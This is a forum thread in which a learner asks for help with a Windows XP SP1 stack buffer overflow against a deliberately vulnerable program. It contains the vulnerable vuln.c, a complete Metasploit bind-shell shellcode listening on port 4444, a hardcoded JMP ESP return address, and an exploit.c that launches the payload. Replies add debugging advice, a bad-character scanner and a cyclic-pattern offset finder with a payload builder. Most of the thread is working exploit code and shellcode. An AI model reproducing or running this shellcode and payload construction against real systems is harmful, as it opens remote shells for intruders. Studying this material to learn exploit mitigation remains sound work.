Help with write exploit (Programming forum, Computer Security: Discussions)
Hi all =) I am now studying (simple) buffer overflows on Windows, but I need some help ;)

This is the simple vulnerable program:

vuln.c
```c
#include <stdio.h>
#include <string.h>
#include <windows.h>

int main(int argc, char *argv[])
{
    char buf[15];             /* 15-byte stack buffer */
    //DebugBreak();
    if (argc != 2) {
        return -1;
    }
    strcpy(buf, argv[1]);     /* unbounded copy of argv[1]: the overflow */
    return 0x0;
}
```

And then, after compiling:

    c:\vuln.exe AAAAAAAAAAAAAAAAAAAAAAAA

EIP is overwritten with 41414141, OK, 41 = A ;)

OK, I find a JMP ESP etc. in ntdll.dll (on my Win XP SP1 ENG I find address 77F9980F) -> ret = \x0F\x98\xF9\x77 for the exploit.

Then I need shellcode for the exploit; I use one from the METASPLOIT project. Shellcode, bind port 4444:

```c
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74"
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce"
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18"
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6"
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16"
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f"
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c"
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18"
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f"
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e"
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f"
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27"
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2"
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a"
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";
```

The exploit string should look like this:

    [AAAAAAAAAAAAAAAAAAAA | EIP | SHELLCODE ]

EIP must be overwritten with the \x0F\x98\xF9\x77 address. This is the exploit for the vulnerable program ;)

exploit.c
```c
/*
 * test exploit for vuln.c by haluZniq ;)
 */
#include <stdio.h>
#include <stdlib.h>     /* system() */
#include <string.h>     /* memset(), strncat() */
#include <windows.h>

int main(void)
{
    char EvilBuff[1024];

    // metasploit shellcode LPORT=4444
    char shellcode[] =
        "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"
        "\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"
        "\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"
        "\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"
        "\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74"
        "\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"
        "\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"
        "\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"
        "\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce"
        "\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"
        "\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"
        "\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18"
        "\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6"
        "\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16"
        "\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f"
        "\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c"
        "\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18"
        "\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f"
        "\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"
        "\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e"
        "\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f"
        "\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27"
        "\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2"
        "\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a"
        "\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";

    // JMP ESP in ntdll.dll (XP SP1 ENG: 0x77F9980F), little-endian
    char jmpesp_offset[] = "\x0F\x98\xF9\x77";

    char Prog[1024] = "vuln ";

    printf("\n> test exploit for vuln\n");

    // [20 x 'A'][ret][shellcode]
    memset(EvilBuff, 0x00, 1024);
    memset(EvilBuff, 0x41, 20);
    strncat(EvilBuff, jmpesp_offset, 1024);
    strncat(EvilBuff, shellcode, 1024);

    // pass the payload as argv[1] of vuln.exe via the shell
    strncat(Prog, EvilBuff, 1024);

    printf("> Exploiting!\n");
    system(Prog);

    return 0;
}
```

..compile, test it, but the exploit does not work :(( Where is the bug? What have I written wrong? What is missing in the exploit, so that it exploits it?

PS: sorry for my poor English ;)

Thanks to all, have a nice day,
haluZniq :]
This is probably Data Execution Prevention in SP2; SEH exploitation might work around this, or just disable it: right-click My Computer > Advanced > Performance > Settings > Data Execution Prevention and select the first option, which should look like "Turn on DEP for essential Windows programs and services only". You're welcome, and thank you for participating in the forum.
Hi, thanks for the answer. But I am testing the exploitation of vuln.c on WIN XP SP1; there is no DEP, I think ;). SEH exploitation I will start studying after I completely understand the simple buffer overflow in win32 :)

This is my problem: I run the exploit:

    C:\>exploit

    > test exploit for vuln
    > Exploiting!
    'Í↓Ҥôkť¤Ýs♫{ť7"Ĺ‼♣ť¤Âo"Ä{}̤¬Ä"Ác°y▲Xă˝ĎěHDŕNBÄjt ů' is not recognized as an internal or external command,
    operable program or batch file.

    C:\>

I don't understand why it writes this error. Where is the bug in the exploit? :(

Should the exploit string look like this?

    [AAAAAAAAAAAAAAAAAAAA | EIP | SHELLCODE ]

Somebody wrote this to me:

    [buffer - garbage data] - EIP (jmp esp) - [nopsled] - [shellcode]

Which is correct?

Thanks very much for all the answers, that is precious information :)
Have a nice day, haluZniq
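An added example, not code from the thread or from Metasploit, that shows what the error above is telling you. exploit.c hands the payload to system(), so it goes through cmd.exe and then the target's argv parser, and both of those interpret some bytes rather than passing them through. The text cmd.exe reports as "not recognized" begins with Í↓, the CP1250 rendering of the bytes \xcd\x19, which in the posted shellcode sit directly after \x7c ('|'): cmd.exe read that byte as a pipe and tried to run what followed as a second command. The scanner below flags that byte and the 0x5e ('^', cmd.exe's escape character) in front of it within the first 32 bytes of the posted shellcode; the bad-character set it uses is this example's own choice, not something the thread states.

```c
/*
 * Added example, not code from the thread: check a payload for bytes that do
 * not survive the delivery path exploit.c uses, system("vuln <payload>").
 *   - 0x00 ends the C string, so everything after it is dropped;
 *   - system() hands the line to cmd.exe, which acts on its metacharacters
 *     (| & < > ^ ( ) % , ; =) and splits on space, tab, 0x0B and 0x0C;
 *   - the target's CRT builds argv by splitting on space/tab and consuming
 *     double quotes.
 * Every such byte has to be absent from padding, return address and shellcode,
 * or the shellcode has to be encoded around them.
 */
#include <stdio.h>
#include <stddef.h>

/* Why a byte is unsafe for the system()/cmd.exe/argv path, or NULL if it is
 * fine. The set is this example's own choice, not something stated in the thread. */
const char *badchar_reason(unsigned char c)
{
    switch (c) {
    case 0x00:                       return "NUL terminates the C string";
    case 0x09: case 0x20:            return "argv separator (tab/space)";
    case 0x0a: case 0x0d:            return "line break";
    case 0x0b: case 0x0c:            return "cmd.exe delimiter";
    case '"':                        return "quote, consumed by the argv parser";
    case '|': case '&': case '<': case '>': case '^': case '(': case ')':
    case '%': case ',': case ';': case '=':
                                     return "cmd.exe metacharacter";
    default:                         return NULL;
    }
}

/* Print every offending byte with its offset; return how many there were.
 * If first_off is non-NULL it receives the first bad offset, or -1 if clean. */
size_t scan_badchars(const unsigned char *buf, size_t len, long *first_off)
{
    size_t bad = 0;
    if (first_off) *first_off = -1;
    for (size_t i = 0; i < len; i++) {
        const char *why = badchar_reason(buf[i]);
        if (why == NULL) continue;
        if (first_off && *first_off < 0) *first_off = (long)i;
        printf("offset %3zu: 0x%02x  %s\n", i, buf[i], why);
        bad++;
    }
    return bad;
}

/* First 32 bytes of the Metasploit bind-shell (LPORT=4444) shellcode posted above. */
static const unsigned char posted_head[] =
    "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"
    "\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19";
#define POSTED_HEAD_LEN (sizeof posted_head - 1)   /* drop the literal's NUL */

/* Number of unsafe bytes in those 32 bytes. */
size_t posted_head_badchar_count(void)
{
    return scan_badchars(posted_head, POSTED_HEAD_LEN, NULL);
}

/* Offset of the first unsafe byte in those 32 bytes, or -1. */
long posted_head_first_badchar(void)
{
    long off;
    scan_badchars(posted_head, POSTED_HEAD_LEN, &off);
    return off;
}

int main(void)
{
    long off;
    size_t n = scan_badchars(posted_head, POSTED_HEAD_LEN, &off);
    printf("%zu unsafe byte(s) in the first %zu shellcode bytes, first at offset %ld\n",
           n, (size_t)POSTED_HEAD_LEN, off);
    return n ? 1 : 0;
}
```

Run against the full shellcode the list gets longer (0x7c appears again, as do 0x20, 0x25 and 0x3a later on). Launching vuln.exe with CreateProcess instead of system() removes the cmd.exe metacharacters from the list but not the argv splitting, so the practical answer is to generate the shellcode with those bytes in its bad-character list, or to deliver the payload some way that is not a command line.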
I can't tell you, because this could come from various things. The best thing to do is to run your vuln.c with a debugger attached, add a breakpoint just before the EIP which should be called, and add another one right at the top of your shellcode, then see if you reach each bp correctly. If you can't see much with this, try to examine the execution step by step with F7 in OllyDbg. Debugging is the only way for you to understand what is bad here.
You must start testing again by overflowing your program, and see in OllyDbg when ESP gets overwritten by your user-supplied data. Put the right amount of nopsled behind your RET address, and after that, your shellcode. This should work.

Grtz, Yorgi
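An added example, not Yorgi's or the original poster's code, of the procedure described above: a Metasploit-style cyclic pattern replaces the run of A's, so the value that lands in EIP identifies the exact distance to the saved return address, and build_payload() then lays out [padding][return address][nop sled][shellcode]. The 20-byte padding and the return address 0x77F9980F (\x0F\x98\xF9\x77) are the numbers the thread gives for the poster's XP SP1 build; the four INT3 bytes standing in for shellcode are a constructed placeholder so that a debugger stops exactly where the real payload would begin.

```c
/*
 * Added example, not code from the thread: find the offset to the saved
 * return address with a cyclic pattern, then lay the payload out as
 *   [padding][return address][nop sled][shellcode]
 */
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* Byte p of the Metasploit-style pattern "Aa0Aa1Aa2...Aa9Ab0Ab1...": the
 * aligned triples are all distinct for 26*26*10 = 6760 triples (20280 bytes),
 * so a 4-byte value read out of EIP maps back to a single offset. */
static unsigned char pattern_byte(size_t p)
{
    size_t t = p / 3;                       /* index of the "Xy9" triple */
    switch (p % 3) {
    case 0:  return (unsigned char)('A' + (t / 260) % 26);
    case 1:  return (unsigned char)('a' + (t / 10) % 26);
    default: return (unsigned char)('0' + t % 10);
    }
}

size_t pattern_create(unsigned char *out, size_t n)
{
    for (size_t i = 0; i < n; i++) out[i] = pattern_byte(i);
    return n;
}

/* eip as the debugger prints it (e.g. 0x41306141): its little-endian bytes are
 * what sat in memory. Returns their offset in a patlen-byte pattern, or -1 if
 * they are not in it (then EIP did not come from our input). */
long pattern_offset(uint32_t eip, size_t patlen)
{
    unsigned char pat[20280], needle[4];
    if (patlen > sizeof pat) patlen = sizeof pat;
    pattern_create(pat, patlen);
    for (int k = 0; k < 4; k++) needle[k] = (unsigned char)(eip >> (8 * k));
    for (size_t i = 0; i + 4 <= patlen; i++)
        if (memcmp(pat + i, needle, 4) == 0) return (long)i;
    return -1;
}

/* [offset x 'A'][ret, little-endian][nops x 0x90][shellcode]; returns the
 * total length, or 0 if cap is too small. */
size_t build_payload(unsigned char *out, size_t cap, size_t offset, uint32_t ret,
                     size_t nops, const unsigned char *sc, size_t sclen)
{
    size_t total = offset + 4 + nops + sclen;
    if (total > cap) return 0;
    memset(out, 'A', offset);
    for (int k = 0; k < 4; k++) out[offset + k] = (unsigned char)(ret >> (8 * k));
    memset(out + offset + 4, 0x90, nops);
    memcpy(out + offset + 4 + nops, sc, sclen);
    return total;
}

/* Numbers from the thread: 20 bytes of padding reach the saved EIP, and
 * 0x77F9980F is the JMP ESP in ntdll.dll the poster found on XP SP1 (written
 * as \x0F\x98\xF9\x77). The shellcode is a constructed stand-in, four INT3s,
 * so a debugger breaks exactly where the real payload would start. */
#define THREAD_RET  0x77F9980Fu
#define THREAD_PAD  20
#define DEMO_NOPS   16
static const unsigned char demo_sc[] = { 0xcc, 0xcc, 0xcc, 0xcc };

size_t demo_payload(unsigned char *out, size_t cap)
{
    return build_payload(out, cap, THREAD_PAD, THREAD_RET, DEMO_NOPS, demo_sc, sizeof demo_sc);
}

/* Scalar views of the demo layout, so it can be checked without a buffer. */
size_t demo_payload_len(void)
{
    unsigned char buf[256];
    return demo_payload(buf, sizeof buf);
}

uint32_t demo_payload_ret(void)           /* the 4 bytes at THREAD_PAD, read back LE */
{
    unsigned char buf[256];
    uint32_t v = 0;
    if (demo_payload(buf, sizeof buf) < THREAD_PAD + 4) return 0;
    for (int k = 0; k < 4; k++) v |= (uint32_t)buf[THREAD_PAD + k] << (8 * k);
    return v;
}

int main(void)
{
    unsigned char buf[256];
    /* Step 1: feed pattern_create() output to vuln.exe, read EIP in the debugger. */
    printf("EIP=0x41306141 -> offset %ld\n", pattern_offset(0x41306141u, 200));
    printf("EIP=0x61413161 -> offset %ld\n", pattern_offset(0x61413161u, 200));
    /* Step 2: build the payload with that offset. */
    size_t n = demo_payload(buf, sizeof buf);
    printf("payload (%zu bytes):", n);
    for (size_t i = 0; i < n; i++) printf(" %02x", buf[i]);
    printf("\n");
    return 0;
}
```

The pattern only tells you where EIP is; whether ESP points at the bytes after the return address (which is what the JMP ESP relies on) is the second thing to confirm in the debugger, and the nop sled absorbs small differences between the ESP you see there and the one at run time.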
Thread URL: http://heapoverflow.com/f0rums/programming/1236-help-write-exploit.html